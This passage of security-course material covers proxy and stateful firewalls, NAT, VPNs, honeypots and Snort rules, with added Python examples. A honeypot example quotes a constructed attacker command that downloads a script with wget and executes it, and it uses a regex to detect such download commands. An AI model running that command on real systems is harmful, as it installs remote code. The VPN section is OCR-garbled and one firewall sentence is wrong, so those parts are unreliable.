Application-based proxy firewalls focus on the application layer rather than just the packets. Application-level gateways (proxies) can filter packets at the application layer of the OSI model (or the application layer of TCP/IP). Incoming and outgoing traffic is restricted to services supported by the proxy; all other service requests are denied. The need for an application-level firewall arises from the tremendous amount of voice, video, and collaborative traffic in the data-link layer and network layer, which may be used for unauthorized access to internal and external networks. Application-level gateways configured as web proxies prohibit FTP, gopher, telnet, or other traffic. They examine traffic and filter application-specific commands such as HTTP post and get. Traditional firewalls are unable to filter such types of traffic. They can inspect, find, and verify malicious traffic that is missed by stateful inspection firewalls to make decisions as to whether to allow access, and they improve the overall security of the application layer. For example, worms that send malicious code in legitimate protocols cannot be detected by stateful firewalls, as proxy firewalls focus on packet headers in the network layer. However, deep packet inspection firewalls can find such attacks with the help of informative signatures added inside packets.
Some of the features of application-level firewalls are as follows:
- They analyze the application information to make decisions as to whether to permit traffic.
- Being proxy-based, they can permit or deny traffic according to the authenticity of the user or process involved.

- A content-caching proxy optimizes performance by caching frequently accessed information rather than sending new requests to the servers for the same old data.
Application-layer firewalls can function in one of two modes: active or passive.
- Active application-level firewalls: They examine all incoming requests, including the actual message that is exchanged, against known vulnerabilities, such as SQL injection, parameter and cookie tampering, and cross-site scripting. The requests that are deemed genuine are allowed to pass through them.
- Passive application-level firewalls: They work similarly to IDS in that they also check all incoming requests against known vulnerabilities, but they do not actively reject or deny those requests if a potential attack is discovered.

Figure 12.15: Example of Application-Level Firewall

Stateful Multilayer Inspection Firewall

Stateful multilayer inspection firewalls combine the aspects of the three above-mentioned types of firewalls (packet filtering, circuit-level gateways, and application-level firewalls). They filter packets at the network layer of the OSI model (or the internet layer of the TCP/IP model) to determine whether session packets are legitimate, and they evaluate the contents of the packets at the application layer.
Using stateful packet filtering, you can overcome the limitation of packet firewalls, which can only filter the IP address, port, protocol, and so on. This multilayer firewall can perform deep packet inspection.
Features of the Stateful Multilayer Inspection Firewall:
- This type of firewall can remember the packets that passed through it earlier and make decisions about future packets accordingly.
- These firewalls combine the best features of both packet filtering and application-based filtering. Cisco PIX firewalls are stateful.
- These firewalls track and log slots or translations.
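Both the "remember the packets that passed through it earlier" feature above and the circuit-level gateway's check of the TCP handshake come down to a connection table: the handshake creates state, and later packets are judged by the session they belong to. The code below is an added example, not the courseware's or any vendor's implementation; its field names, state names, idle timeout, port policy and the constructed packet trace are assumptions made for illustration.

```python
"""Stateful TCP inspection: the handshake creates state, later packets are
judged by the session they belong to, not only by their own header.
Added example, not part of the EC-Council courseware. Field names, state
names, the idle timeout and the constructed traffic are illustrative.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# One session is identified by (inside ip, inside port, outside ip, outside port).
ConnKey = Tuple[str, int, str, int]


@dataclass(frozen=True)
class TcpPacket:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    flags: frozenset       # subset of {"SYN", "ACK", "PSH", "FIN", "RST"}
    direction: str         # "out" = leaving the private network, "in" = entering it
    ts: float              # arrival time in seconds


@dataclass
class Conn:
    state: str             # SYN_SENT -> SYN_RECEIVED -> ESTABLISHED
    last_seen: float


class StatefulInspector:
    IDLE_TIMEOUT = 300.0   # seconds of silence before a session is forgotten

    def __init__(self, allowed_outbound_ports: frozenset):
        self.allowed_outbound_ports = allowed_outbound_ports
        self.table: Dict[ConnKey, Conn] = {}

    @staticmethod
    def _key(p: TcpPacket) -> ConnKey:
        # Normalise so that both directions of one session map to the same key.
        if p.direction == "out":
            return (p.src_ip, p.src_port, p.dst_ip, p.dst_port)
        return (p.dst_ip, p.dst_port, p.src_ip, p.src_port)

    def _expire(self, now: float) -> None:
        for key in [k for k, c in self.table.items() if now - c.last_seen > self.IDLE_TIMEOUT]:
            del self.table[key]

    def inspect(self, p: TcpPacket) -> str:
        """Return 'allow' or 'drop' for one packet and update the state table."""
        self._expire(p.ts)
        key = self._key(p)
        conn = self.table.get(key)
        syn, ack = "SYN" in p.flags, "ACK" in p.flags

        if conn is None:
            # Only an outbound SYN (no ACK) to a permitted port may create a session.
            if p.direction == "out" and syn and not ack and p.dst_port in self.allowed_outbound_ports:
                self.table[key] = Conn("SYN_SENT", p.ts)
                return "allow"
            # Unsolicited inbound packet, or a connection that does not start with SYN.
            return "drop"

        # Walk the three-way handshake, then let data flow in both directions.
        if conn.state == "SYN_SENT" and p.direction == "in" and syn and ack:
            conn.state = "SYN_RECEIVED"
        elif conn.state == "SYN_SENT" and p.direction == "out" and syn and not ack:
            pass                                   # retransmitted SYN
        elif conn.state == "SYN_RECEIVED" and p.direction == "out" and ack and not syn:
            conn.state = "ESTABLISHED"
        elif conn.state == "ESTABLISHED":
            pass
        else:
            return "drop"                          # packet out of sequence for this session

        conn.last_seen = p.ts
        if p.flags & {"FIN", "RST"}:
            # Simplified teardown: forget the session on the first FIN or RST.
            # A production tracker would follow the full closing exchange.
            del self.table[key]
        return "allow"


def run_trace(inspector: StatefulInspector, packets: List[TcpPacket]) -> List[str]:
    """Inspect a sequence of packets and return the verdict for each."""
    return [inspector.inspect(p) for p in packets]


# Constructed trace: an inside host opens HTTPS to a remote server, the server
# answers, then a stranger pushes data at a port nobody inside opened.
TRACE = [
    TcpPacket("10.0.0.7", 50000, "203.0.113.10", 443, frozenset({"SYN"}), "out", 0.0),
    TcpPacket("203.0.113.10", 443, "10.0.0.7", 50000, frozenset({"SYN", "ACK"}), "in", 0.1),
    TcpPacket("10.0.0.7", 50000, "203.0.113.10", 443, frozenset({"ACK"}), "out", 0.2),
    TcpPacket("203.0.113.10", 443, "10.0.0.7", 50000, frozenset({"ACK", "PSH"}), "in", 0.3),
    TcpPacket("198.51.100.5", 443, "10.0.0.7", 50001, frozenset({"ACK", "PSH"}), "in", 0.4),
]

if __name__ == "__main__":
    for pkt, verdict in zip(TRACE, run_trace(StatefulInspector(frozenset({443})), TRACE)):
        print(f"{pkt.direction:3s} {sorted(pkt.flags)} -> {verdict}")
```

The same inbound reply that a stateless filter had to drop is admitted here because the table records the outbound SYN that solicited it.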

Figure 12.16: Example of Stateful Multilayer Inspection Firewall
Application Proxy
An application-level proxy works as a proxy server and filters connections for specific services. It filters connections based on the services and protocols when acting as a proxy. For example, an FTP proxy will only allow FTP traffic to pass through while all other services and protocols will be blocked. It is a type of server that acts as an interface between the user workstation and the Internet. It correlates with the gateway server and separates the enterprise network from the Internet. It receives a request from a user to provide the Internet service and responds to the original request only. A proxy service is an application or program that helps forward user requests (for example, FTP or Telnet) to the actual services. A proxy is also known as an application-level gateway, as it renews the connections and acts as a gateway to the services. Proxies run on a firewall host that is either a dual-homed host or some other bastion host for security purposes. Some proxies, namely caching proxies, improve network efficiency. They keep copies of the requested data of the hosts that they proxy. Such proxies can provide the data directly when multiple hosts request the same data. Caching proxies help in reducing the load on network connections, whereas proxy servers provide both security and caching.
A proxy service is available to the user in the internal network and the service in the outside network (Internet), and it is transparent. Instead of direct communication, the user talks with the proxy and it handles all the communication between users and Internet services. Transparency is the main advantage of proxy services. To the user, a proxy server presents an illusion that it is dealing directly with the real server, whereas to a real server, the proxy server gives the illusion that it is dealing directly with the user.
Advantages
- Proxy services are useful for logging because they can understand application protocols and effectively allow logging.

- Proxy services reduce the load on network links as they are capable of caching copies of frequently requested data and allow it to be directly loaded from the system instead of the network.
- Proxy systems perform user-level authentication, as they are involved in the connection.
- Proxy systems automatically protect weak or faulty IP implementations as they sit between the client and the Internet and generate new IP packets for the client.
Disadvantages
- Proxy services lag behind non-proxy services until suitable proxy software is available.
- Each service in a proxy may use different servers.
- Proxy services may require changes in the client, applications, and procedures.

Network Address Translation (NAT)
Network address translation (NAT) separates IP addresses into two sets and enables the LAN to use these addresses for internal and external traffic. The NAT helps hide an internal network layout and force connections to go through a chokepoint. It also works with a router, and similarly to packet filtering, it will also modify the packets that the router sends simultaneously. When the internal machine forwards the packet to the external machine, the NAT modifies the source address of the packet to make it appear as if it is coming from a valid address. When the external machine sends the packet to the internal machine, the NAT modifies the destination address to turn the visible address into the correct internal address. The NAT can also change the source and destination port numbers. It limits the number of public IP addresses that an organization can use. It can act as a firewall filtering technique whereby it allows only those connections that originate in the internal network and blocks the connections that originate in the external network.
NAT systems use different schemes for translation between internal and external addresses:
- Assign one external host address for each internal address and always apply the same translation. This slows down connections and does not provide any savings in address space.
- Dynamically allocate an external host address without modifying the port numbers when the internal host initiates a connection. This restricts the number of internal hosts that can simultaneously access the Internet to the number of available external addresses.
- Create a fixed mapping from internal addresses to externally visible addresses but use a port mapping so that multiple internal machines use the same external address.

- Dynamically allocate an external host address and port pair each time an internal host initiates a connection. This makes the most efficient possible use of the external host addresses.
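The last scheme, dynamic address-and-port allocation, is the one worth seeing in code, since it shows at once the source rewrite on the way out, the destination rewrite on the way back, the filtering effect on unsolicited inbound packets, and the translation-lifetime guess listed under the disadvantages. This is an added example, not the courseware's or any router vendor's code; the public address 203.0.113.1, the tiny port pool, the idle timeout and the constructed flows are assumptions for illustration.

```python
"""Port-based dynamic NAT (the last scheme in the list above): every new
outbound connection receives an (external address, external port) pair,
replies are mapped back, and unsolicited inbound packets have no mapping.
Added example, not part of the EC-Council courseware. The address ranges,
port pool, idle timeout and the constructed flows are illustrative.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

Endpoint = Tuple[str, int]                   # (ip, port)
FlowKey = Tuple[str, int, str, int]          # (inside ip, inside port, remote ip, remote port)


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


class PortNat:
    def __init__(self, external_ips: List[str], port_range=(1024, 65535), idle_timeout=120.0):
        self.external_ips = list(external_ips)
        self.low, self.high = port_range
        self.idle_timeout = idle_timeout
        self._cursor = 0                                   # round-robin position in the pool
        self.outbound: Dict[FlowKey, Endpoint] = {}        # inside flow -> public (ip, port)
        self.inbound: Dict[Tuple[Endpoint, Endpoint], FlowKey] = {}  # (public, remote) -> inside flow
        self.in_use: Set[Endpoint] = set()
        self.last_used: Dict[FlowKey, float] = {}

    def _pool_size(self) -> int:
        return len(self.external_ips) * (self.high - self.low + 1)

    def _allocate(self) -> Endpoint:
        """Hand out the next free (ip, port) pair from the public pool."""
        ports = self.high - self.low + 1
        for _ in range(self._pool_size()):
            idx, self._cursor = self._cursor, (self._cursor + 1) % self._pool_size()
            candidate = (self.external_ips[idx // ports], self.low + idx % ports)
            if candidate not in self.in_use:
                self.in_use.add(candidate)
                return candidate
        raise RuntimeError("NAT pool exhausted")

    def translate_out(self, p: Packet, now: float = 0.0) -> Packet:
        """Inside -> outside: rewrite the source to a public pair, recording the mapping."""
        key = (p.src_ip, p.src_port, p.dst_ip, p.dst_port)
        ext = self.outbound.get(key)
        if ext is None:
            ext = self._allocate()
            self.outbound[key] = ext
            self.inbound[(ext, (p.dst_ip, p.dst_port))] = key
        self.last_used[key] = now
        return Packet(ext[0], ext[1], p.dst_ip, p.dst_port)

    def translate_in(self, p: Packet, now: float = 0.0) -> Optional[Packet]:
        """Outside -> inside: restore the internal destination, or None (drop) when no
        inside host started this flow. This is the filtering effect the text describes."""
        key = self.inbound.get(((p.dst_ip, p.dst_port), (p.src_ip, p.src_port)))
        if key is None:
            return None
        self.last_used[key] = now
        inside_ip, inside_port = key[0], key[1]
        return Packet(p.src_ip, p.src_port, inside_ip, inside_port)

    def expire(self, now: float) -> int:
        """Drop translations idle longer than idle_timeout; returns how many were freed.
        The timeout is the 'guess' about translation lifetime the text lists as a drawback."""
        stale = [k for k, t in self.last_used.items() if now - t > self.idle_timeout]
        for key in stale:
            ext = self.outbound.pop(key)
            self.in_use.discard(ext)
            del self.inbound[(ext, (key[2], key[3]))]
            del self.last_used[key]
        return len(stale)


if __name__ == "__main__":
    # Constructed scenario: one public address, two inside hosts using the same source port.
    nat = PortNat(["203.0.113.1"], port_range=(1024, 1025))
    a = nat.translate_out(Packet("10.0.0.7", 50000, "198.51.100.20", 80), now=0.0)
    b = nat.translate_out(Packet("10.0.0.8", 50000, "198.51.100.20", 80), now=1.0)
    print("outbound:", a, b)
    print("reply to b:", nat.translate_in(Packet("198.51.100.20", 80, "203.0.113.1", 1025), now=2.0))
    print("unsolicited:", nat.translate_in(Packet("198.51.100.99", 80, "203.0.113.1", 1024), now=3.0))
    print("expired:", nat.expire(now=500.0))
```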
Advantages
- Network address translation helps to enforce the firewall's control over outbound connections.
- It restricts incoming traffic and allows only packets that are part of a current interaction initiated from the inside.
- It helps hide the internal network's configuration and thus lowers the success rate of attacks on the network or system.
Disadvantages
- The NAT system has to guess how long it should keep a particular translation, which is not always possible.
- The NAT interferes with encryption and authentication systems used to ensure the security of the data.
- Dynamic allocation of ports may interfere with packet filtering.

Virtual Private Network
A virtual private network (VPN) is a network that provides secure access to the private network through the Internet. VPNs are used for connecting wide area networks (WAN). They allow computers on one network to connect to computers on another network. They are used for the secure transmission of sensitive information over an untrusted network via encapsulation and encryption. They employ encryption and integrity protection, enabling you to use a public network as a private network. A VPN performs encryption and decryption outside the packet filtering perimeter to allow the inspection of packets coming from other sites. It establishes a virtual point-to-point connection through the use of dedicated connections. A VPN also encapsulates packets sent over the Internet. It combines the advantages of both public and private networks. VPNs have no relation to firewall technology, but firewalls are convenient for adding VPN features as they help in providing secure remote access services. Only the computing device running the VPN software can access the VPN.
All VPNs that run over the Internet adopt the following principles:
- Encrypt the traffic
- Check for integrity protection
- Encapsulate new packets, which are sent across the Internet to some destination that reverses the encapsulation
- Check the integrity
- Decrypt the traffic eventually

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Advantages
=
APN hidesall the trafficthat flowsover it, ensuresencryption,
and protects
datafrom,
snooping.
=
remote accessfor protocols
It provides whileavoiding attackers
fromthe Internet at
large.
Disadvantages
‘=
As the VPN runs on a public the user will bevulnerable
network, to an attackon the
destinationnetwork.

ical andCountermensores
Mackin ©by E-Comel
Copyright
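As an added illustration of the principle list above (it is not code from the courseware or from any VPN product), the Python below walks one packet through the sequence: encrypt, add integrity protection, encapsulate in a new outer packet, and on the receiving side check the integrity and only then decrypt. The fixed key material, the HMAC-SHA256 counter-mode keystream, the 44-byte outer header, and the function names are assumptions made for the example; a real VPN uses negotiated per-session keys and a standard protocol such as IPsec or TLS.

```python
"""Toy tunnel illustrating the principle sequence: encrypt the inner packet,
add integrity protection, encapsulate it in a new outer packet; the far end
checks integrity first and only then decrypts. Added example, not from the
courseware and not a real VPN protocol: the keystream (HMAC-SHA256 in counter
mode), the outer header layout and the fixed keys are constructed for
illustration; a real VPN negotiates fresh session keys."""
import hashlib
import hmac
import os
import struct

ENC_KEY = b"\x11" * 32      # constructed demo keys
MAC_KEY = b"\x22" * 32
NONCE_LEN, ADDR_LEN, TAG_LEN = 12, 16, 32
HEADER_LEN = 2 * ADDR_LEN + NONCE_LEN       # outer src | outer dst | nonce = 44 bytes


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """PRF in counter mode; a nonce must never be reused under the same key."""
    blocks, counter = [], 0
    while sum(len(b) for b in blocks) < length:
        blocks.append(hmac.new(key, nonce + struct.pack(">I", counter), hashlib.sha256).digest())
        counter += 1
    return b"".join(blocks)[:length]


def xor_bytes(data: bytes, mask: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, mask))


def encapsulate(inner_packet: bytes, outer_src: str, outer_dst: str, nonce: bytes = None) -> bytes:
    """Inner packet -> outer header || ciphertext || MAC (encrypt-then-MAC)."""
    nonce = os.urandom(NONCE_LEN) if nonce is None else nonce
    ciphertext = xor_bytes(inner_packet, keystream(ENC_KEY, nonce, len(inner_packet)))
    header = (outer_src.encode().ljust(ADDR_LEN, b"\0")
              + outer_dst.encode().ljust(ADDR_LEN, b"\0") + nonce)
    tag = hmac.new(MAC_KEY, header + ciphertext, hashlib.sha256).digest()
    return header + ciphertext + tag


def decapsulate(wire: bytes) -> bytes:
    """Reverse the encapsulation; raise (i.e. drop) if the MAC does not verify."""
    if len(wire) < HEADER_LEN + TAG_LEN:
        raise ValueError("truncated tunnel packet")
    header, ciphertext, tag = wire[:HEADER_LEN], wire[HEADER_LEN:-TAG_LEN], wire[-TAG_LEN:]
    expected = hmac.new(MAC_KEY, header + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):          # integrity check before decryption
        raise ValueError("integrity check failed; packet dropped")
    nonce = header[2 * ADDR_LEN:HEADER_LEN]
    return xor_bytes(ciphertext, keystream(ENC_KEY, nonce, len(ciphertext)))


def outer_addresses(wire: bytes):
    """All a packet filter between the endpoints can see: the outer header."""
    src = wire[:ADDR_LEN].rstrip(b"\0").decode()
    dst = wire[ADDR_LEN:2 * ADDR_LEN].rstrip(b"\0").decode()
    return src, dst


if __name__ == "__main__":
    inner = b"GET /payroll HTTP/1.1\r\nHost: intranet\r\n\r\n"   # constructed inner packet
    wire = encapsulate(inner, "203.0.113.5", "198.51.100.77")
    print(outer_addresses(wire), decapsulate(wire) == inner)
```

outer_addresses() shows what a packet filter sitting between the two endpoints sees: the outer addresses and an opaque body. That is the reason the text says decryption should happen outside the packet-filtering perimeter: the filter has to inspect the inner packet after decapsulation, not the tunnel packet. A packet whose MAC fails is rejected before decryption is attempted; flipping a single ciphertext byte makes decapsulate() raise.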
Firewall Limitations

Although firewalls are essential to your security strategy, they have the following limitations:
- Firewalls can restrict users from accessing valuable services such as FTP, Telnet, NFS, etc., and they sometimes restrict Internet access as well.
- A firewall cannot prevent internal attacks (backdoors) in a network, e.g., a disgruntled employee who cooperates with an external attacker.
- A firewall focuses its security at a single point, which makes other systems within the network prone to security attacks.
- A bottleneck could occur if all the connections pass through the firewall.
- A firewall cannot protect the network from social engineering and data-driven attacks whereby the attacker sends malicious links and emails to employees inside the network.
- If external devices such as laptops, mobile phones, portable hard drives, etc., are already infected and connected to the network, then a firewall cannot protect the network from these devices.
- A firewall is unable to adequately protect the network from all types of zero-day viruses that try to bypass it.
- A firewall cannot do anything if the network design and configuration is faulty.
- A firewall is not an alternative to antivirus or antimalware tools.
- A firewall does not block attacks from a higher level of the protocol stack.
- A firewall does not prevent attacks originating from common ports and applications.
- A firewall does not prevent attacks from dial-in connections.
- A firewall is unable to understand tunneled traffic.
Honeypot

A honeypot is a computer system on the Internet intended to attract and trap those who attempt unauthorized or illicit utilization of the host system to penetrate an organization's network. It is a decoy that is run to catch attackers by logging the traffic that passes through it and then sending abuse complaints to the ISPs concerned. It has no authorized activity or production value, and any traffic to it is likely a probe, attack, or compromise. Whenever there is any interaction with a honeypot, it is most likely to be malicious. Honeypots are unique; they do not solve a specific problem. Instead, they are highly flexible tools with many different security applications. Honeypots help in preventing attacks, detecting attacks, and information gathering and research. A honeypot can log port access attempts or monitor an attacker's keystrokes; these could be early warnings of a more concerted attack. It requires a considerable amount of effort to maintain a honeypot.

Figure 12.17: Example of Honeypot
Types of Honeypots

Honeypots are classified into the following types based on their design criteria:

- Low-interaction Honeypots
Low-interaction honeypots emulate only a limited number of services and applications of a target system or network. If the attacker does something that the emulation does not expect, the honeypot will simply generate an error. They capture limited amounts of information, i.e., mainly transactional data and some limited interactions. These honeypots cannot be compromised completely. They are set up to collect higher-level information about attack vectors such as network probes and worm activities. Some examples are KFSensor, Specter, and Honeytrap.

KFSensor is a low-interaction honeypot used to attract and identify penetrations. It implements vulnerable system services and Trojans to attract hackers. This honeypot can be used to monitor all TCP, UDP, and ICMP ports and services. KFSensor identifies and raises alerts about port scanning and DoS attacks.

Honeytrap is a low-interaction honeypot used to observe attacks against TCP and UDP services. It runs as a daemon and starts server processes dynamically on requested ports. Attackers are tricked into sending responses to the honeytrap server process. The data that is received by the honeypot is concatenated into a string and stored in a database file. This string is called the attack string. Honeytrap parses attack strings for a command requesting the server to download a file from another host in the network. If such a command is detected, the server tries to access the corresponding file automatically. It supports only the FTP and TFTP protocols. It also identifies and logs HTTP URIs.
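The following Python is an added example (not part of the courseware, and not the code of honeytrap, KFSensor, or Specter) of what a low-interaction emulation does with the behaviour described above: it answers a handful of expected commands, returns a generic error for anything the emulation does not expect, logs every line, concatenates everything received into an "attack string", and extracts the URL from download commands such as wget or curl without ever fetching it. The fake FTP responses, the class and function names, and the attacker transcript are all constructed for the illustration.

```python
"""Low-interaction service emulation: answer a few expected commands, return a
generic error for anything else, record every line, build the 'attack string',
and pull download URLs out of wget/curl/tftp commands without fetching them.
Added example, not part of the courseware and not honeytrap's or KFSensor's
code; the attacker input is constructed."""
import re
from dataclasses import dataclass, field
from typing import List

# A download command followed, within the same shell statement, by a URL
DOWNLOAD_CMD = re.compile(
    r"\b(wget|curl|tftp)\b[^;|&\n]*?((?:https?|ftp|tftp)://[^\s;|&\"']+)", re.IGNORECASE)


@dataclass
class Session:
    peer: str                                  # attacker address, for the log
    log: List[str] = field(default_factory=list)
    attack_string: str = ""                    # everything received, concatenated
    download_urls: List[str] = field(default_factory=list)
    authenticated: bool = False

    def banner(self) -> str:
        """Sent on connect: a plausible but fake FTP greeting."""
        return "220 ftpd ready\r\n"

    def handle_line(self, line: str) -> str:
        self.log.append(f"{self.peer} > {line!r}")
        self.attack_string += line + "\n"
        for match in DOWNLOAD_CMD.finditer(line):
            self.download_urls.append(match.group(2))   # record only, never fetch
        verb, _, _arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "USER":
            return "331 Password required\r\n"
        if verb == "PASS":
            self.authenticated = True                  # any password works: keep them talking
            return "230 Login successful\r\n"
        if verb == "QUIT":
            return "221 Goodbye\r\n"
        # Anything the emulation does not expect gets a generic error
        return "500 Unknown command\r\n"


def run_session(peer: str, lines: List[str]) -> Session:
    """Feed a whole transcript through one emulated session and return it."""
    session = Session(peer)
    for line in lines:
        session.handle_line(line)
    return session


if __name__ == "__main__":
    # Constructed attacker transcript
    transcript = [
        "USER anonymous",
        "PASS guest@",
        "SITE EXEC wget http://198.51.100.23/bot.sh -O /tmp/b; sh /tmp/b",
        "MKD /pub/.x",
    ]
    s = run_session("192.0.2.44", transcript)
    print("\n".join(s.log))
    print("download URLs:", s.download_urls)
```

Fetching the referenced file is deliberately left out: an operator who wants the sample should retrieve it from an isolated analysis host rather than from the sensor, because the download itself can be used to fingerprint or attack the honeypot. Wiring handle_line() to a socket server turns this into a listener of the kind the text describes; the session logic stays the same.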
- Medium-interaction Honeypots
Medium-interaction honeypots simulate a real OS as well as applications and services of a target network. They present a more convincing illusion of an OS than low-interaction honeypots. Therefore, it is possible to log and analyze more complex attacks. These honeypots capture more useful data than low-interaction honeypots. They can respond only to preconfigured commands; nevertheless, the risk of intrusion is higher than with low-interaction honeypots. The main disadvantage of medium-interaction honeypots is that the attacker can quickly discover that the system behavior is abnormal. Some examples of medium-interaction honeypots include HoneyPy, Kojoney2, and Cowrie.

Kojoney2 is a medium-interaction honeypot that emulates a real SSH environment. This honeypot listens on port 22 for incoming SSH connections. If a connection request is initiated, Kojoney2 will verify users against an internal list of fake users. Usually, the connections are accepted by granting access to the SSH shell. It simulates many shell commands to trick attackers. Using Kojoney2, attackers can download files using the wget and curl commands.

- High-interaction Honeypots
Unlike their low- and medium-interaction counterparts, high-interaction honeypots do not emulate anything; they run actual vulnerable services or software on production systems with a real OS and applications. These honeypots offer all services and applications of a target network. They can be completely compromised by attackers to gain full access to the system in a controlled area. They capture complete information about an attack vector such as attack techniques, tools, and intent. The honeypotized system is more prone to infection, as attack attempts can be carried out on real production systems.

A honeynet is a prime example of a high-interaction honeypot. It is neither a product nor a software solution that a user installs. Instead, it is an architecture: an entire network of computers designed to be attacked. The idea is to have an architecture that creates a highly controlled network with real computers running real applications, in which all activities are monitored and logged. "Bad guys" find, attack, and break into these systems through their own initiative. When they do, they do not realize that they are in a honeynet. Without the knowledge of the attackers, all their activities and actions, from encrypted SSH sessions to email and file uploads, are captured by inserting kernel modules into the honeynet systems. At the same time, the honeynet controls the attacker's activity. Honeynets do this by using a honeywall gateway, which allows inbound traffic to the victim's systems but controls the outbound traffic using intrusion prevention technologies. This gives the attacker the flexibility to interact with the victim's systems but prevents the attacker from harming other non-honeynet computers.
- Pure Honeypots
Pure honeypots emulate the real production network of a target organization. They cause attackers to devote their time and resources toward attacking the critical production system of the company. Attackers uncover and discover the vulnerabilities and trigger alerts that help network administrators to provide early warnings of attacks and hence reduce the risk of an intrusion.

Honeypots are classified into the following types based on their deployment strategy:

- Production Honeypots
Production honeypots are deployed inside the production network of the organization along with other production servers. Although such honeypots improve the overall state of security of the organization, they effectively capture only a limited amount of information related to the adversaries. Such honeypots fall under the low-interaction honeypot category and are extensively employed by large organizations and corporations. As production honeypots are deployed internally, they also help to find out internal flaws and attackers within an organization.

- Research Honeypots
Research honeypots are high-interaction honeypots primarily deployed by research institutes, governments, or military organizations to gain detailed knowledge about the actions of intruders. By using such honeypots, security analysts can obtain in-depth information about how an attack is performed, how vulnerabilities are exploited, and which attack techniques and methods are used by the attackers. This analysis, in turn, can help an organization to improve attack prevention, detection, and security mechanisms and develop a more secure network infrastructure. The main drawback of research honeypots is that they do not contribute to the direct security of the company. If a company is looking to improve its production infrastructure, it should opt for a production honeypot.

Honeypots are classified into the following types based on their deception technology:

- Malware Honeypots
Malware honeypots are used to trap malware campaigns or malware attempts over the network infrastructure. These honeypots are simulated with known vulnerabilities such as outdated APIs, the vulnerable SMBv1 protocol, etc., and they also emulate different Trojans, viruses, and backdoors that encourage adversaries to perform exploitation activities. These honeypots lure the attacker or malware into performing attacks, from which the attack pattern, malware signatures, and malware threat actors can be identified effectively.

- Database Honeypots
Database honeypots employ fake databases that are vulnerable to database-related attacks such as SQL injection and database enumeration. These fake databases trick the attackers by making them think that the databases contain crucial sensitive information such as the credit card details of all the customers and employee databases. However, all the information present in the database is fake and simulated. Such databases lure the attacker into performing attacks against their vulnerabilities; from the attacks, the attack pattern and the threat actor's TTPs toward database attacks can be identified effectively.

- Spam Honeypots
Spam honeypots specifically target spammers who abuse vulnerable resources such as open mail relays and open proxies. Basically, spam honeypots consist of mail servers that deliberately accept emails from any random source on the Internet. They provide crucial information about spammers and their activities.

- Email Honeypots
Email honeypots are also called email traps. They are nothing but fake email addresses that are specifically used to attract fake and malicious emails from adversaries. These fake email IDs will be distributed across the open Internet and dark web to lure threat actors into performing various malicious activities to exploit the organization. By constantly monitoring the incoming emails, the adversary's deception techniques can be identified by the administrators, and internal employees can be warned to avoid falling into such email traps.

- Spider Honeypots
Spider honeypots are also called spider traps. These honeypots are specifically designed to trap web crawlers and spiders. Many threat actors perform web crawling and spidering to extract important information from web applications. Such crucial information includes URLs, contact details, directory details, etc. Spider honeypots are employed to trap such adversaries. A fake website will be emulated and presented as a legitimate one. Threat actors attempting to perform web crawling on such traps will be identified and blacklisted.

- Honeynets
Honeynets are networks of honeypots. They are very effective in determining the entire capabilities of the adversaries. Honeynets are mostly deployed in an isolated virtual environment along with a combination of vulnerable servers. The various TTPs employed by different attackers to enumerate and exploit networks will be recorded, and this information can be very effective in determining the complete capabilities of the adversary.
Module Flow

IDS, IPS, Firewall, and Honeypot Solutions

The previous section discussed the function, role, and placement of IDS, IPS, firewalls, and honeypots for securing networks. A number of easy-to-use and feature-enriched solutions (hardware, software, or both) are available for the implementation of IDS, IPS, firewalls, and honeypots. This section discusses some commercially available solutions that simplify the usage of IDS, IPS, firewalls, and honeypots.
Intrusion Detection Tools: Snort, Suricata, and AlienVault OSSIM
Intrusion Detection Tools

Intrusion detection tools detect anomalies. These tools, when running on a dedicated workstation, read all network packets, reconstruct user sessions, and scan for possible intrusions by looking for attack signatures and statistical anomalies in network traffic. Moreover, these tools offer real-time, zero-day protection from network attacks and malicious traffic, and they prevent malware, spyware, port scans, viruses, DoS, and DDoS from compromising hosts.

Snort
Source: https://www.snort.org
Snort is an open-source network intrusion detection system capable of performing real-time traffic analysis and packet logging on IP networks. It can perform protocol analysis and content searching/matching, and it is used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, and OS fingerprinting attempts. It uses a flexible rules language to describe the traffic that it should collect or pass, as well as a detection engine that uses a modular plug-in architecture.

Uses of Snort:
- Straight packet sniffer, such as tcpdump
- Packet logger (useful for network traffic debugging, etc.)
- Network intrusion prevention system

Figure 12.18: Screenshot of Snort
Snort Rules

Figure 12.19: Snort output

Snort's rule engine allows custom rules to meet the needs of the network. Snort rules help in differentiating between normal Internet activities and malicious activities. Snort uses the popular libpcap library (for UNIX/Linux) or WinPcap (for Windows), the same library that tcpdump uses to perform its packet sniffing. Attaching Snort in promiscuous mode to the network media decodes all the packets passing through the network. It generates alerts according to the content of individual packets and the rules defined in the configuration file.

Snort allows users to write their own rules. However, each of these Snort rules must describe the following:
- Any violation of the security policy of the company that might be a threat to the security of the company's network and other valuable information
- All well-known and frequent attempts to exploit the vulnerabilities in the company's network
- The conditions in which a user thinks that a network packet (or packets) is unusual (i.e., if the identity of the packet is not authentic)

Snort rules, written for both protocol analysis and content searching and matching, should be robust and flexible. The rules should be "robust": the system should maintain a hard check on the activities taking place on the network and notify the administrator of any potential intrusion attempt. The rules should be "flexible": the system must be sufficiently compatible to act immediately and take the necessary remedial measures according to the nature of the intrusion.

Both flexibility and robustness can be achieved using an easy-to-understand and lightweight rule-description language that aids in writing simple Snort rules. Consider the following two primary principles while writing Snort rules:
- No written rule must extend beyond a single line; thus, rules should be short, precise, and easy to understand. (Later Snort versions accept a trailing backslash to continue a rule on the next line, but the rule is still parsed as one unit.)
- Each rule should be divided into two logical sections:
  * The rule header
  * The rule options

The rule header contains the rule's action, the protocol, the source and destination IP addresses, the source and destination port information, and the Classless Inter-Domain Routing (CIDR) block. The rule option section includes alert messages in addition to information about the inspected part of the packet to determine whether to take any rule action.

alert tcp !192.168.1.0/24 any -> 192.168.1.0/24 111 (content: "|00 01 86 a5|"; msg: "external mountd access";)

Figure 12.20: Example of Snort rules
Snort Rules: Rule Actions and IP Protocols

